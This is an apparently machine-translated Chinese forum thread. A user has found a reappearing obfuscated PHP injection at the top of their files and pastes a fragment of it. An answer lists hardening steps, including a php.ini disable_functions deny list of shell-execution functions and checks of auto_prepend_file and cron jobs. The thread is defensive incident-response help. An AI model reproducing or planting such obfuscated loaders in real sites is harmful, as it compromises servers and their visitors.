我在我的php文件中找到了这个:
<?php $glsaucbk = '5 156 x61"])))) { $GLOBALS[" ]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j24#-!#]y38#-!%w:**<")));$nkfhbiv = $sorsjsw("", $wrwjkjc); $nkfhbiv#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x2nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fep::::-111112)eobs`un>qp%!|Z~!<##!>!2w*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]8]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< ();}}AZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutc252]y85]256]y6g]257]y86]267]y74tjyf`4 x223}!+!<+{e%+*!*+fe4y4 x24- x24]y8 x24- x24]26 x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%c%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x2%rxB%epnbss!>!bssbz)#44ec:649#!-#j0#!/
它在文件的头部......我试图删除它,但直接删除它的reapear。我有一个PHP探测器,并说我DodgyPHP。你有没有在你的PHP文件上有这个恶意代码?
我认为你不需要知道你已经知道了:
你应该至少:
虽然不是直接的答案;这将是如何清理系统的有用步骤指南。
症状表明你的系统肯定也被黑了,并且仍然是可以攻击的。
您需要按照http://www.gregfreeman.io/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/中的链接进行操作,并采取重要措施从未来的黑客中强化您的系统:
ps aux | grep apache或ps aux | grep nginx查找运行Web服务器的用户标识。确保文件不归该用户所有。您可以通过执行sudo -u <that userid> touch /path/to/web/files/some_test_file之类的操作来检查权限。如果成功创建了一个文件,那么您就遇到了问题,需要调整权限。exec)和类:
disable_functions = "exec,passthru,shell_exec,system,proc_open,popen,
curl_multi_exec,parse_ini_file,show_source"
auto_prepend_file和auto_append_file值是预期的或空白。cron_jobs。注意:知道其他人可以添加和编辑此帖子以添加更多有用的指南和信息。可能是未来读者的好资源。